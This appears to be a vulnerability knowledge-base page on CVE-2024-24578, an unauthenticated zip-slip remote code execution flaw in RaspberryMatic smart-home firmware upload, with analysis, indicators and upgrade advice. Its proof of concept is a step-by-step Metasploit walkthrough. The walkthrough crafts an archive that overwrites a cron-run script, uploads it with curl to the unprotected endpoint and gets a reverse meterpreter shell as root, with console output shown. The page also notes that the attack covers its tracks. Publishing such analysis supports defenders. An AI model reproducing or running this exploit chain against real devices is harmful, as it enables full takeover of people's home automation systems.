Very High
CVE-2024-24578
Very High
(1 user assessed)
Very High
(1 user assessed)Unknown
Unknown
Unknown
Description
RaspberryMatic is an open-source operating system for HomeMatic internet-of-things devices. RaspberryMatic / OCCU prior to version 3.75.6.20240316 contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within the Java based HMIPServer.jar component. RaspberryMatric includes a Java based HMIPServer, that can be accessed through URLs starting with /pages/jpages. The FirmwareController class does however not perform any session id checks, thus this feature can be accessed without a valid session. Due to this issue, attackers can gain remote code execution as root user, allowing a full system compromise. Version 3.75.6.20240316 contains a patch.
Add Assessment
Technical Analysis
RaspberryMatic is a free and non-commercial open-source operating system for running a smart-home IoT central to provide connectivity to the homematicIP / HomeMatic hardware line of IoT devices. It can be directly installed on a CCU3 or ELV Charly hardware device. Alternatively, it can also be installed on a wide range of freely available single-board-computers (SBC) like a RaspberryPi, ASUS Tinkerboard, Hardkernel ODROID or hardware platforms like an Intel NUC system. Furthermore, it can be run as a virtual appliance in modern virtualization environments (e.g. Proxmox VE, VirtualBox, Synology VMM, Docker/OCI, Kubernetes/K8s, vmWare ESXi, etc).
RaspberryMatic / OCCU contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within the Java based HMIPServer.jar component. The webui allows for Firmware uploads which can be reached through the URL /pages/jpages/system/DeviceFirmware/addFirmware.
This allows an unauthenticated attacker to upload a malicious .tgz archive to the server, which will be automatically extracted without any further checks. As this entry can contain ../sequences, it is possible to break out of the predefined temp directory and write files to other locations outside this path.
This vulnerability is commonly known as the Zip Slip vulnerability and can be used to overwrite arbitrary files on the main filesystem. It is therefore possible to overwrite the watchdog script with a malicious payload in /usr/local/addons/mediola/bin, which will be executed every five minutes through a cron job where attackers can gain remote code execution as root user, allowing a full system compromise.
The full details of this vulnerability can be found in the GHSA-q967-q4j8-637h security disclosure from Jens Maus.
You can easily test this vulnerability by downloading a vulnerable OVA image from here and install it in VirtualBox or VMware Fusion.
Proof of Concept
- Launch Metasploit
- select the zip slip module
- set TARGETPAYLOADPATH to
../../../../../../../../../..//usr/local/addons/mediola/bin/watchdogto overwrite watchdog script with payload
- run the module
- compress the resulting tar file to .tgz format
- lauch a Listener
- upload the malicious
msf.tgzfile usingcurl
- wait maximum five minutes for
cronto kick-in and run the overwritten watchdog script
- Bingo, a
meterpretersession should pop-up…
msf6 > use exploit/multi/fileformat/zip_slip [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp msf6 exploit(multi/fileformat/zip_slip) > options Module options (exploit/multi/fileformat/zip_slip): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.tar yes The name of the archive file FTYPE tar yes The archive type (Accepted: tar, zip) TARGETPAYLOADPATH ../payload.bin yes The targeted path for payload Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.201.8 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port **DisablePayloadHandler: True (no handler will be created!)** Exploit target: Id Name -- ---- 0 Manually determined View the full module info with the info, or info -d command. msf6 exploit(multi/fileformat/zip_slip) > set TARGETPAYLOADPATH ../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog TARGETPAYLOADPATH => ../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog msf6 exploit(multi/fileformat/zip_slip) > exploit [+] msf.tar stored at /root/.msf4/local/msf.tar [*] When extracted, the payload is expected to extract to: [*] ../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog msf6 exploit(multi/fileformat/zip_slip) > gzip /root/.msf4/local/msf.tar [*] exec: gzip /root/.msf4/local/msf.tar msf6 exploit(multi/fileformat/zip_slip) > mv /root/.msf4/local/msf.tar.gz /root/.msf4/local/msf.tgz [*] exec: mv /root/.msf4/local/msf.tar.gz /root/.msf4/local/msf.tgz msf6 exploit(multi/fileformat/zip_slip) > use multi/handler [*] Using configured payload cmd/unix/reverse_bash msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lport 4444 lport => 4444 msf6 exploit(multi/handler) > exploit -j -z [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 0.0.0.0:4444 msf6 exploit(multi/handler) > jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: multi/handler linux/x86/meterpreter/reverse_tcp tcp://0.0.0.0:4444
Upload malicious compressed tar file.
# curl --insecure -H "Content-type: multipart/form-data" -F filename=@/root/.msf4/local/msf.tgz https://192.168.201.6/pages/jpages/system/DeviceFirmware/addFirmware ${addDevFirmwareInfoCorrupt}
Wait five minutes…
msf6 exploit(multi/handler) > [*] Sending stage (1017704 bytes) to 192.168.201.6 [*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.6:47982) at 2025-01-28 21:00:01 +0000 msf6 exploit(multi/handler) > sessions -i Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/linux root @ 192.168.201.6 192.168.201.8:4444 -> 192.168.201.6:47982 (192.168.201.6) msf6 exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : 192.168.201.6 OS : (Linux 6.1.74) Architecture : x64 BuildTuple : i486-linux-musl Meterpreter : x86/linux meterpreter > getuid Server username: root meterpreter > shell Process 15622 created. Channel 1 created. uname -a Linux homematic-raspi 6.1.74 #1 SMP PREEMPT Tue Jan 30 06:46:28 UTC 2024 x86_64 GNU/Linux exit meterpreter >
Pretty straightforward, but unfortunately the existing zip-slip module in Metasploit only supports a limited amount of payloads.
However, RaspberryMatic is supported on a range platforms like Raspberry Pi, ASUS Tinkerboard or ODROID which are all ARM based single-board-computers.
Therefore I developed a separate Metasploit module: PR19841 that covers most of the RaspberryMatic supported architectures and fully automates the attack.
Indicators of Compromise (IOCs)
Unfortunately there is not much to go on in the log files. The only IOC might be the overwritten watchdog script in /usr/local/addons/mediola/bin which contains a malicious payload. However, the Metasploit module will cover these tracks by restoring the original watchdog script after a successful attack .
Mitigation
RaspberryMatic versions <= 3.73.9.20240130 are vulnerable. Please upgrade your RaspberryMatic installation to the latest version or at least to version 3.75.6.20240316 where this issue has been fixed.
References
CVE-2024-24578
GHSA-q967-q4j8-637h security disclosure
Metasploit Module PR 19841: RaspberryMatic Unauthenticated RCE via Zip Slip
Credits
h0ng10 => discovery of the vulnerability
jens-maus => verifier and remediation
CVSS V3 Severity and Metrics
General Information
Vendors
- jens-maus
Products
- RaspberryMatic
